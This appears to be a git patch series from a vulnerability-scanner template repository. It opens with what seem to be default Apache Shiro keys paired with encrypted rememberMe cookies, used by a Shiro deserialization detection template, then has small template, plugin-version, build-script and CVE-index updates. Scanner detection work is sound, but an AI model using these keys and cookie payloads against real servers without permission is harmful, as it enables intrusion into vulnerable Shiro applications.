+bXRvbnMAAAAAAAAAAAAAAA==:9NzFe08tottstCwpXjV/lHyYhIZnoVyO+zu1gk3WoWkHiF0xhj4f1Htd5w7OWFrpnsM/e0WX1E/WICCfDGUqtg4wslgRcMROJGgF5H3pPjvghEj1O3U6kj+lQgzJVyPdmSgfarLIwoicuieobaW1iFKtKj461wpfTCKhuza+70igvLaB142Qw5JuOhiCpuJ72JghLxLuhHoRjk+zGzTl7sEbRH8+WaFqPTmJONdQnJ4NCZRyexG059UE7j/aBbEQOZ8DuywIH5zSgZudJvBZoJJAnFZfbLATzdFmL6qISrUzstPZgOYN+L7qzwOmzEmhIS8XVuxP4qnKM/6+glCRWLWc7fouqtxN1t/ap3SmwFIVW6w38FTDAXjPF2ywmwDKdZa/esNNEcplIVH7U/t3nR6xIQYUb4tpg8uelfyU66A6O59oO7cDMqJ+Upbgaknw30E5a6iczeaBCWna1o6Y2VrnEdLzWSLgcLtYZZs/J23Vn2jGFt1/1etbtjvdhdMsE1y/2jUyxaSsFl1fLTTgyDCxStZ/cXigm7cPy1aylag=
+lxuEtAWbv+SgUOXREM+zrA==:HMOSRNvT8uQq1FiTKK/qZBbtZoUShsLfw5ZBj8Uw0P+eLcx/RcthU1yMs24vEsT1CveVYhq56YklfdJEAWACP4WlpQFEWVk0RN5o0xzCZxh9Wy8YdIiRlv93wK8yEvqo7cRy6MCb1uszQmrUtNlSpVT8P3ybG4foGZpVLdosEMyAIGqif0cX6l0IrrehSyl/V9p6mRYiA3mM1FqPtjSp+faO29dfzWwp44fLWMebJ2cCEYtHVfY8futYusbWfJUNcQr3NLFq6VTcOs2ZjqN6mMLOZ3HD9Cl2OIM1MjUm6868PtY6x0f3bq06i5/OsbQhUdTpAT8LWgP7NF3WytttOIy9Zs0W4K39AIemxGpW0o52QhnPyH9hJyvp15s081bqNcCmvdZjPyFadqzAsL9DnaudaF0duualygBQgEjof7dCeC8R8REDcsJyuG5RQJk6bX39vC7vfP5IGN5mrcHrE8s7UCZR3AKXl/eFS37ikUaoINa2nGRTSUZX+KDJgK02m+Dv2bYVjl2QJIigeltCzCw1f7ZCdgEcacWLWf36OaM=
+HoTP07fJPKIRLOWoVXmv+Q==:m75grc/rLjZuQ2XILD7N915dMBdo1uKoknQlpiBqWN2WhVhghVoFOsvgdtLAvpHSA+5f2Of0oUIYNy3jVONYIrgZLCJIRTiDJm4Wvujv8HwBTMsPo0r8XtJPaQGaz+ZkISXQDLdnHZy0Guz68ZynK2ZI7DYeBss4LjxS8NoxmujOV8IMWx1IrxhdY47Jbc1a3zqxwLQS8nBs35YczNuQxJVsI4HpUpfkALk9LohyLrN5Bj3ZdKBVuZ5sd0IZ1tc2behdjR4etMlYkrD4tfZpifsq3GsHT9n5MpmpQzhQdvDvbTgM4kdB/X7EbagNau0N+qpayx/Qcxp1jmrqaBfKxDdKy5at52B4k12v+6dtvRIB0Ua/8hEdvAwFaVhxAOB1FviQCTiCa2AmFbVw1SkWmnZs10NRVDXepdzOxJOvkg7iOegbnuFoLH35N3jPitE9ZLV71TWkW5qTJBl623+CpOQtXIWTdsZ0xDtwbsGhnxaaspq0YE4ugLh5WtzDtjo+vRN2xw+Ypgewx15hWMpjFxb3xEuhRelELKQHIUmbHzM=
+Is9zJ3pzNh2cgTHB4ua3+Q==:wWHtjKwtqTCTksGwobphKVKGQwa9Dym4RCgj9V3au/TzhuZ18uubWGQ96HmuI/Tbnsykyti0LKw1fDgb7mpGb+ixrIsdZEnfqz2YZKT+bKlZ61eRGRjZFUzMsAK27L9i81e1DR4j/F/5UzE16D4PSzoi2zyr8uN9V/M6Hwd6ESidZ1dW8ji7M7Im7YWzwg0SY6RQxTHj+30yVQAuhZWFY9CDxhi+5TIuHUw1CrMHY5bSPDCirf9EBbPjwcopCvwSNNYYW7f/HwS/NGRl2TZGh9H7uCWwclb03G7MWdElRLywZiDEE9rIF5Tu+f+FmYW8gJTXv5hu7gJflLTvoWIVZ6DjRsnWA2AQAcqREYgvRbMG/2YnFqvOtIu+No2ma83+memufDv6MhaswQ55oywNFWxZNCmacR0k9wUvadm1g06EFGAT4jSJnM0EBSgkiHqHx+hj1cC2uKXVDpNXRFBT6d3YYCYLP9iZtokrTY92jisvOyHaBT/Ajblhkzy4slruUOrP9PUyfT+s+40XTc7k1jmQDuD+GxC/N/lbTUcTWGU=
+empodDEyMwAAAAAAAAAAAA==:XH1jRHDFPGxkA/GXSQ8Wf6y+gWQY8Y11dDxnvKQy7pFthZJOSYMkOZMgqmrGK39h+oPJC+UOydqzH6G7552cgd93GqSvjl06jGMWuTTJUPOE5S2/PZgZNkicyb9l4abPHjTQvUeSustFEEtBQX83IGrTYQzvuEXsEznw/AlrGIFHLUh/uOmgzkDzlF6kv4KlEVGcpE7FHDE/kBGHpxQMyT8Eka88rdMXH5R2d1jHvoLKfjRRJwxYUcFiF301NQgP8ZGd5fbEDxikEfUkTIKxG7d9DSFVJOJsVrjhJ9XRtfY6wpwHX/kI1U0D/9lttKQL7U9BSSpJ8Hago/+om3C7LypJFu4vDA+ntTIdO0XHmpRzWnrkurZYnX0JrYdFThvlqkCAgVKeKfgkMeb9UwHNZMBIc41U5jnwECWjctHr7SRErhOOSqQfpgPCe4lG/1fq2X1jgMFe0CD5dG53aYd0GdzKg9ZS9tOvjh/aoC/24G9nVxd+y9eXkjCEMAOzoa8JwC7rIKyLpgz7X364l8rQaNGtIhJgn7WasMXwWnbzgXo=
+A7UzJgh1+EWj5oBFi+mSgw==:K9KN+EMlF81hzaETBtBq8TccUSKh+aJl0Mx0ET8cgERrocsovJKrNemC2PfUFdhwPy5Up7m47txaMPuN4E0VzfK4p+3ObwTujyEF7b2MNqyVVmzx3MOT9Ls4jEr0eImr+cSirdFPBmzMaiP3skwSX8Eg1YmP5sJQW0ZvrF9nR9z9AGEFMi1UguEZezjliLEpUGY+g5Tad723iBgd3Q/2rGIjo6eXf0lH0iTDpfZM/Oq2HUUz+nPcajZey4GsaaTFWt8nKyhJBTSDWTErrnE41NtpyYFPp4UWQWRzcXlg7cqVZHS+AQ/Jp6CPGbXY5P9Z763HN55cSWbiGrRnZCQyi+sVR0H1okTaB7hwif9ouaaW61dPHPxMDdlcI7cEV8uI4eS1zDfzdTyvjbhlvfQgTIajENn1gHKu/xTVGG6gJ8Ix8wO1eDloet1EOcFZ0tgHs4nKpZoRmaCw75b6at9v9QX1qUniZ8TKr4Au0BCIKT6uTM+S/DHQ1FOsR3vh6TG3Ri5DUmj1TOILFtpRCcntAKgg1/X+H/FgjipePZqOQ9o=
+c2hpcm9fYmF0aXMzMgAAAA==:5+iZUeoglwkizt6lMYbovmoo5VBrQeI/MSLg1lrJ4FKlH6dBgVKNFIJCeSSVqcsAmzRmHQX4P22sRhXcAzt3JBxE92OpsHJCQ4pA9A3Dx05fUZLnR6r0njDCN3Sd+S5D92jrk9vRrfQ3rNiRz5uCpoQVh541IOt9FAwja9Xfq4Oa/2oKscKPM8q6MLdU3Th77J/1GmeJznNfzwbt9r+uTCYss7oSUVRVSBZVIC4gTVMDYzvg3GfzdQom8QDEKbp3BMiB/aQkMqYNQ5la3SLUL9rGvQEfD46ZdInW7LlWNWWd8wTx+3RMB1WLLu18BYzy0FUWlJASaLOlwWWghLZggsOQRrjYZq0ygOZqpUYoD6It2quJjO41BExwUz1+WUR1Dk+KSrv+B14R65z13OI46JYz553XJBnEN4w+z/8PuHewHs6+scd5kgsRWdOT6fRNYshFFU2Ob1UJeu/kWg6c+4oIsRUcZr2S58BNNwUr31Fb/bl905qRFOl7wC8nLeWPjrxsG5dsYsh98ArJArDjte2e5TgsCwzNsvPJSWuV9lY=
+i45FVt72K2kLgvFrJtoZRw==:LDgM2RLvDhLB/GDDDXwlSmyl5frMbggtfZ7UQbpM6t4VK0QVCYcHNCifWY7WPZaEZO5nKBJr59KcgvyD7ffLU3BEYkXcb0XaGzn88Ds+BbYzZgtmuG87VdwkjhyWrKPxMh4/eZncALoxiw6ISO/0YlCq+Io0JCK5EsZeMystJEnKzVP/jjaaIC+ISLZJdAqWEycknyKY+1z0eZwKfc15hoBMpn7/HxV4ieatitE/lHrh/qMHgTWZZM1tPg+NzbXIu1eksgcWOhIBeZ19XuT+AT6WZ/1e2JWOt1pqdXpa3J8AOh2KDMKCkpfMQNHkx0YZrhG68t2td5sa8iKRdmohMWOY4FTJM1AuH98aLVciXMNuH68LFDpY09y68FF4mo0ifHeFuurdJRGkPpErm0O+OrKPwt6GhmvS8KA+zUl4idX/1VAlLAvKnIXZaskQA+lGkpLD3U/BP9/wYYtpyQcgi+NqlyxIYPIwx+eO66v+QkNYvTqEWOcs4AcWaQ5AX/mFIVGLTNdr8wmoLHgLKtdP7JOhMV4R6wAERVq3baCqxhI=
+U3BAbW5nQmxhZGUAAAAAAA==:Jofo1QeruwgPYjNN0o1XVduySoOFloaICyWvGB8xB1rku0uhfoQPXP3hgPmjfF9zxLLBlbuE2b/73UxuEJ1sNS8oH88savOgnxSQnGQV5tE8MoxsEqKgXS28hAcInj6CQyLZkgfWHI8mUojWiiH1siyJe5DlfBDwivHJBNi6P5yjePJQ1qWCiLdrsPFxHX+5PDdEb2XGbO8cxDRPLLH4rKVF9cSqH+1F85DRpamvqqe9rX6c0UsORxFx2eN1VjWzO0RH8RLpWCrEsWENIVqTknPPeBImcjyGWNOsqePIP3nxUb/xTfWjFEUg4W70DLy8EflDLxrF/xsADRzxruCDVqu+3p1j2mGYfR6LHRLSelwv7gksdeDdFpasKcO+WAxcgxME7dj3WWLueQ9mRDnQqAWIFrIIX3RPlxS/Ou0GK9BYVzFWJ6cUPUy9yGFDFFIwKwyw6erJ6G0aRvmHyYDFBErdF5PZ1WW0UQ1U1ghS5JsHjf5gHhaiApEUEuroYrYzRTO8wL4MIx9NRuovsgWMwn156QodqrRNyiHev3Pmb1A=
+Jt3C93kMR9D5e8QzwfsiMw==:CKKIsDg2JMQjigmtHHz58eeL9W/DLONPBEkMyZqnDYD4azkq1H/VJM4oTKkz9F42W5MdyxpabueKFPeery9fSjNy1cH8ByvgSLkcrFVhTq0lRLY04be4oLWjXAHq2MMycdyozEhmzvQ3rcTh4/7Vzb2ziQ0iroHH38vXUVsYUkE/qr+BH1cEAh/hC/k4ge40W3tNHaK3hyT6Eh9Dpn7+8lAk0jAOV8ZGA/16TSQOMtjVq4EOzCBwUCauORXXbKu2OwSdrisoRvfzQbXA/mLyInJIU/eRXoJHZmcuDMzn9ebCCs265ProdjJqEsV8coByhDxOr7J+vwJ3Z9DQyfLf1xBJzQ5FqYIoD1tbhijAFu+oUJcCO8CcbqZhPESxXkFpPfiNP5IrpCxIypFiUpvRxdsDRMEE6I5QnfudsCmDTMIOP/q8HwtkuFyomzgYUUaarOWjqoP798PKanto5xd4KLmlC5Sc5PA7rG17Zin0L5+z9df9jtHANhwaErmitf73mvj09AyoV1G8MpcdxywChzOoOdUCoAyQOHIFcVH+7TM=
+MTIzNDU2NzgxMjM0NTY3OA==:uqVaApvtdZdkyLCSe2aatuSvwhECUuHqCDL0fA618hm7b2wAS9LbGNbtzHmsPlS89YZUuMUvrV8EhzZwu2jQrHGVVHbotzrGKpwcwyENqD3cafuULIkgk512EgJpMvCzWIEXhA7Szc3MGr9btkzxel0hODyJkhCghgJ/LQpPRmH+GuXuaEbIXSrD4bddmIWgqJjPEULFMVC3AMEG4W3kcLP3dbg7/jBrN10+B8pjEy5TTf/tILF3GMhyGDPWVCIakHCbQNOowvG29JI3gESSMyEVy2zlx+sz+xBi4UrAJYckT+etD2XCfDsHissff3nMVMi5WSVqygaFra2UTa2q9jp/NkO8C+8XpBI9MuupOeXVlaFNUhJA+Ce/0hTyiVqg5cb0bySIIQvwjHCqK+Dbgl19CGIaRftvuSxZHrjih/qPCcDu4Yc+oNGP+qeKbO8BlVFcspxqIiaibtyKHSBiHApPSEujhI+k/HWqqzYH7tOnzjrcNd8LoxECBdb4Qv3EWKfliUsXg5TAtqIW1UkF4B//doAze/SA4LKCQ/WdU8A=
+vXP33AonIp9bFwGl7aT7rA==:k5JerpAVAXUDlQrjm5F4aT0jigsf3qa49i7caYN8m/wLfRxKaP83KAKuwa4oFhkjLve3wDi3YUDj1JBBvVTIx7HhHxeO2z5VaPCZde9kq/2pp0+R3qzvFlRQa3O6s5iNSkSPti6UOfXwEeIR9xBi0rvhfWPDHt95G+TTR9bdiN6SKQbggRRUhloO1aqIRdm2GDEmwWQXf0756dKNiVayU+OFEIYrgIRJAIcSGBLrZrIurcD2bKlamdI0pAMln2CkHTKKsBfDzG0j04tkFhXcM/SnOh+SohLP5ddOD/OdVUNxmM42tlQ8lyCIPKU48qgYQRwgF/lAVux5N8cOqNtVUOO13PtDPxJyycnVcKnQ+RIlXf0x9QUJW1JZD+YRIEpZyuisNJW70UddJypP2YcnbiuNXGni0a/PBP9bxJXLmejq1SdtpL2GGUOeeiciys0kaEIsldhHGuGAUQvSBAlpd8YOm6S7HSgh8ZNtHPWcFbEazyL12P9mnDTXQwmtPdljpRAvNyHm52LiK+aPzILDwl26xcxhXhDq4Eznv5W4lvU=
+V2hhdCBUaGUgSGVsbAAAAA==:hFyL3b+toX9F69S6dw88ue27+TK3lQp1CQZt3K52AzL1V0RL/JkAhrvVOOT8tMUk6+Aq6Jor3lHkm1EnjjQZMZ41S0AtmTzXOXOZgkbRKjtsvp9AK4VYugC9PIV8lToI57XbQCvu+yuCVnFMk3Kvb/9FwJqN0KUJ52+w0IoGP28UjPlqgqc9IuKFh4t3a2qZBDipBl7FYCzt6B40rk7cCzzfqm106AdoABsZd68hLwG/1+Pyo177jhvsFfQtZCeERPy8wmMgCvECBKE+yCW36I+YUTPklqipSPKpZdTGJgC5Jn6TjxfSDvpXx2bTmkjoZ1JWi9WENiZadO1R3Zk+1+kX/vFl0nKNjEN1AdOsLADxqIk70NDgbN8tmH1Nxq//M195VeAqgFZiqwvn+cB7/r8+dZvhXx25WWvka0u6LXFV8J0bV+1WAXjQhB/xKCxAuI67Lqma3OQ7OFHbwrzEUNh4Wo8NBdIaScYdwK9ZoQ0A4Ks9klFg/EaEWr39C+dbGP39GE8Ddp9VUdsJUHnuDLeCAjUkJ1XAwRgauWXMiM4=
+Q01TX0JGTFlLRVlfMjAxOQ==:LCR/PdrkxDRYCq4Wj2kK59JYNb4m5sVI6QXKV10gjOBdfAHN9liVdY10suB04rdM1FC8VQUuDD1pbOGzsA+x/k4YC90qrLqn9qKcZ2OXMWaKoV6YBkV8oonYc5k40VVTjXOs35tTR9ftZZuEvLlY2I/dEmwLg71eDSj4Zb9CQD5fR1/5R+A/0CS0oQBiazyVg7oXcUEahTScmgSeXDUmnuVgDNYWjoP/ZYWsHIVWVMDk7TN+ietvBL5AyZ5FHTDQSh67VjVIGJ6JiHMfFY+YEIkaxkAhPZVaC3R9CbAvcRHqXDpuL44Q3cXd7B4UfHczTrffvz3IVgzl+3xK9l13teof6u2LFHOvfKYx/5EcsEhKPW3yjyZlvBwDhoRSL1CrO7b80utMRDO4OzqHvnZ2YLVklLIch95SuGzHsH2a++IabaUdTM+jO33yyCXCcAVQBxUP7VmHXGreqwOYl1O59i/NNo0Vvuu9eEq2OOqE1WCOPgRLHBeknWHq3IS+AFZxY3eF8tV+bGthYovRZea8cNZg/9pUG3lbuVSMDLY0cN8=
+66v1O8keKNV3TTcGPK1wzg==:hF4AN/CHT0Lm8NhymLwsu+qdDfD51Iu+w20ZkIu3rkNNckfh3bnMxP/TxeZLGyyOigYu+fqzUUOivV++OLtE6EweCG791gm9P+rDaMz9nNPVRarK1n/m7hNbgy3d4+regnEYEkSQF6TZTuwwmYLvRlMhO9xCcayamJ9YJIzFBNn7A6vakU15EKNWgsXUc0Pi65tBnxFS9zOdbokux4jH8uxFh5h4vcStNDYs1LbiwABrq+rgs1aHgrayDsReJBUjL0K6SfMu8mo6ljpN6ONPmwiTdCd2uGmKOY49GsjnGCaDUqBJ7DfrzOM+BFvYNq3jVD+p4/AAWyppE77g87+fNpFPYDYVDuiwVPOZ1gGfM/9tuFwOLeicW4RE0t6ceStphiRc2HhRDwM+dzfCF3Hkc+0U/uFRxrp+EkJ8YSUWw5Xat6LofoPZHQLGTNSYnDYrinPHFIFHi+YIW1UE/u1gakJrv1UvKtZlXblEBRM7qypDXdM4adXBhIS8dR1DqZbMNEVZpEnsA2FyJrGv6JyQIbpyXkIu1uhDjlmoqgpJtY0=
+SDKOLKn2J1j/2BHjeZwAoQ==:mCPAMufTIgWYnkYaOMLGL98kB4Q4SU9xpo5nV/TxOMNYLPEC8TUkJLMiSs6sUA1/ywCd7A+YqxfbUB26AXW0Ii6XCwAxG8ZiIw9XUtMMT7hbaFRF/JZVgCqYek5Yl/xqJvhC42gu4dn89evIO2m2kA5fvpWcWlyWoeDHAxeudE1JAtkNi5YNXFfUjoMSZO40S7I84djNG4gisP6lQeu8Dkz/VxcViQHb6yuA/Cvbwye/9IMXv4cBVed3gYhkPxp6yL7C5D2AwQoa7bmXYAXZP6BtQN0Kuj4UX72XHTa8IZYA8Pq0TjH1YSnGoapLfAg6Le3yNA/LMkhd9yTaH47wsE/S+U/Y8D7DNK/McEJqrNebtVBS2/tdR+riVWHrqSajqnofTlvCLqKxz0hz73/ofCqewZ+pOQ6/fDnRE4T/Dr/A7EkpX4kIZt1skwy7K6tL7ZO/mZBqGOlYSRjQKXLbnYKNq24JK6AwW0efwU2Is9NZEtbjfQCZpd+idLf0mMQigwMP0jDXohF51ckoCFMVHsNuHvEZNHF41zvnqBN4n8U=

From 34a19dd885aab37e6eaa40d4a55abbaa8df718b6 Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Mon, 25 Sep 2023 23:21:28 +0530
Subject: [PATCH 0514/1090] fix trailing space

---
 .../apache/shiro/shiro-deserialization-detection.yaml           | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml b/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml
index 99f9567fc2..d64eaf61a8 100644
--- a/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml
+++ b/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml
@@ -21,7 +21,7 @@ http:
         GET / HTTP/1.1
         Host: {{Hostname}}
         Cookie: JSESSIONID={{randstr}};rememberMe={{key}};
-    
+
     payloads:
       key: helpers/wordlists/shiro_encrypted_keys.txt
 

From 6082650d6ca5919c66f6a98cde732ae01229dd6d Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 04:02:26 +0000
Subject: [PATCH 0515/1090] Auto WordPress Plugins Update [Tue Sep 26 04:02:26
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/google-site-kit.txt     | 2 +-
 helpers/wordpress/plugins/host-webfonts-local.txt | 2 +-
 helpers/wordpress/plugins/wordfence.txt           | 2 +-
 helpers/wordpress/plugins/wp-seopress.txt         | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt
index 0c9149e71b..6b191cf739 100644
--- a/helpers/wordpress/plugins/google-site-kit.txt
+++ b/helpers/wordpress/plugins/google-site-kit.txt
@@ -1 +1 @@
-1.109.0
\ No newline at end of file
+1.110.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt
index 722fb619ce..4b1e48ed97 100644
--- a/helpers/wordpress/plugins/host-webfonts-local.txt
+++ b/helpers/wordpress/plugins/host-webfonts-local.txt
@@ -1 +1 @@
-5.7.2
\ No newline at end of file
+5.7.4
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt
index 6fd425b992..904cb71b84 100644
--- a/helpers/wordpress/plugins/wordfence.txt
+++ b/helpers/wordpress/plugins/wordfence.txt
@@ -1 +1 @@
-7.10.3
\ No newline at end of file
+7.10.4
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt
index 7104585f9a..73a86b1970 100644
--- a/helpers/wordpress/plugins/wp-seopress.txt
+++ b/helpers/wordpress/plugins/wp-seopress.txt
@@ -1 +1 @@
-7.0
\ No newline at end of file
+7.0.1
\ No newline at end of file

From a1be3e9931377bda9248d36315462690a2ca8d9f Mon Sep 17 00:00:00 2001
From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com>
Date: Tue, 26 Sep 2023 10:07:37 +0530
Subject: [PATCH 0516/1090] Update yaml2json.go - fix #8172

---
 .github/scripts/yaml2json.go | 135 +++++++++++++++++++----------------
 1 file changed, 75 insertions(+), 60 deletions(-)

diff --git a/.github/scripts/yaml2json.go b/.github/scripts/yaml2json.go
index 914cb5cd0a..19d7b6a6a2 100644
--- a/.github/scripts/yaml2json.go
+++ b/.github/scripts/yaml2json.go
@@ -16,78 +16,93 @@ type Classification struct {
 }
 
 type Info struct {
-	Name        string         `yaml:"name"`
-	Severity    string         `yaml:"severity"`
-	Description string         `yaml:"description"`
+	Name           string         `yaml:"name"`
+	Severity       string         `yaml:"severity"`
+	Description    string         `yaml:"description"`
 	Classification Classification `yaml:"classification,omitempty"`
 }
 
 type Data struct {
-	ID          string `yaml:"id"`
-	Info        Info   `yaml:"info"`
-	FilePath    string `json:"file_path"`
+	ID       string `yaml:"id"`
+	Info     Info   `yaml:"info"`
+	FilePath string `json:"file_path"`
 }
 
 func main() {
 	if len(os.Args) != 3 {
-		fmt.Println("Usage: go run main.go  ")
+		fmt.Println("Usage: go run main.go  ")
 		os.Exit(1)
 	}
 
-	directory := os.Args[1]
+	input := os.Args[1]
 	outputFile := os.Args[2]
+	var directories []string
+
+	// Check if the input contains a comma
+	if strings.Contains(input, ",") {
+		directories = strings.Split(input, ",")
+	} else {
+		directories = []string{input}
+	}
 
 	var data []Data
 
-	err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
-		if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
-			yamlFile, err := ioutil.ReadFile(path)
-                if err != nil {
-                    fmt.Printf("Error reading YAML file %s: %v\n", path, err)
-                    return err
-                }
-    
-                var d Data
-                err = yaml.Unmarshal(yamlFile, &d)
-                if err != nil {
-                    fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
-                    return err
-                }
-                if d.Info.Classification.CVSSScore == "" {
-                    d.Info.Classification.CVSSScore = "N/A"
-                }
-                if d.Info.Classification == (Classification{}) {
-                    d.Info.Classification.CVSSScore = "N/A"
-                }
-		fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
-                d.FilePath = fpath
-    
-                data = append(data, d)
-            }
-            return nil
-        })
-    
-        if err != nil {
-            fmt.Printf("Error reading directory: %v\n", err)
-            os.Exit(1)
-        }
-    
-        var jsonData []byte
-        for _, d := range data {
-            temp, err := json.Marshal(d)
-            if err != nil {
-                fmt.Printf("Error marshalling JSON: %v\n", err)
-                os.Exit(1)
-            }
-            jsonData = append(jsonData, temp...)
-            jsonData = append(jsonData, byte('\n'))
-        }
-        err = ioutil.WriteFile(outputFile, jsonData, 0644)
-        if err != nil {
-            fmt.Printf("Error writing JSON data to file: %v\n", err)
-            os.Exit(1)
-        }
-    
-        fmt.Println("JSON data written to", outputFile)
-    }
-    
+	for _, directory := range directories {
+		fmt.Println("Generating data for", directory)
+
+		err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
+			if err != nil {
+				fmt.Printf("Error accessing path %s: %v\n", path, err)
+				return err
+			}
+			if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
+				yamlFile, err := ioutil.ReadFile(path)
+				if err != nil {
+					fmt.Printf("Error reading YAML file %s: %v\n", path, err)
+					return err
+				}
+
+				var d Data
+				err = yaml.Unmarshal(yamlFile, &d)
+				if err != nil {
+					fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
+					return err
+				}
+				if d.Info.Classification.CVSSScore == "" {
+					d.Info.Classification.CVSSScore = "N/A"
+				}
+				if d.Info.Classification == (Classification{}) {
+					d.Info.Classification.CVSSScore = "N/A"
+				}
+				fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
+				d.FilePath = fpath
+
+				data = append(data, d)
+			}
+			return nil
+		})
+
+		if err != nil {
+			fmt.Printf("Error reading directory: %v\n", err)
+			os.Exit(1)
+		}
+	}
+
+	var jsonData []byte
+	for _, d := range data {
+		temp, err := json.Marshal(d)
+		if err != nil {
+			fmt.Printf("Error marshalling JSON: %v\n", err)
+			os.Exit(1)
+		}
+		jsonData = append(jsonData, temp...)
+		jsonData = append(jsonData, byte('\n'))
+	}
+	err := ioutil.WriteFile(outputFile, jsonData, 0644)
+	if err != nil {
+		fmt.Printf("Error writing JSON data to file: %v\n", err)
+		os.Exit(1)
+	}
+
+	fmt.Println("JSON data written to", outputFile)
+}

From 2f285c394e45c25dcc8d12ea14971a84950025fa Mon Sep 17 00:00:00 2001
From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com>
Date: Tue, 26 Sep 2023 10:11:05 +0530
Subject: [PATCH 0517/1090] Update cve2json.yml - fix 2 #8172

---
 .github/workflows/cve2json.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml
index 0dffd1488a..9f61160cf0 100644
--- a/.github/workflows/cve2json.yml
+++ b/.github/workflows/cve2json.yml
@@ -24,7 +24,7 @@ jobs:
         run: |
           go env -w GO111MODULE=off
           go get gopkg.in/yaml.v3
-          go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json
+          go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/,$GITHUB_WORKSPACE/network/cves/ cves.json
           md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
           git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
           
@@ -42,4 +42,4 @@ jobs:
           git pull --rebase
           git push origin ${{ github.ref }}
         env:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
\ No newline at end of file
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

From 4a02d8a67f75b0822e0aa011a58e2d5cdeb23e82 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 04:42:15 +0000
Subject: [PATCH 0518/1090] Auto Generated cves.json [Tue Sep 26 04:42:15 UTC
 2023] :robot:

---
 cves.json              | 19 ++++++++++++++++++-
 cves.json-checksum.txt |  2 +-
 2 files changed, 19 insertions(+), 2 deletions(-)

diff --git a/cves.json b/cves.json
index a2fb580a8e..78099bc39d 100644
--- a/cves.json
+++ b/cves.json
@@ -1901,7 +1901,7 @@
 {"ID":"CVE-2023-23488","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.9.8 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23488.yaml"}
 {"ID":"CVE-2023-23489","Info":{"Name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","Severity":"critical","Description":"WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23489.yaml"}
 {"ID":"CVE-2023-23491","Info":{"Name":"Quick Event Manager \u003c 9.7.5 - Cross-Site Scripting","Severity":"medium","Description":"The Quick Event Manager WordPress Plugin, version \u003c 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-23491.yaml"}
-{"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492 2.yaml"}
+{"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492.yaml"}
 {"ID":"CVE-2023-2356","Info":{"Name":"Mlflow \u003c2.3.0 - Local File Inclusion","Severity":"high","Description":"Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2356.yaml"}
 {"ID":"CVE-2023-23752","Info":{"Name":"Joomla! Webservice - Password Disclosure","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-23752.yaml"}
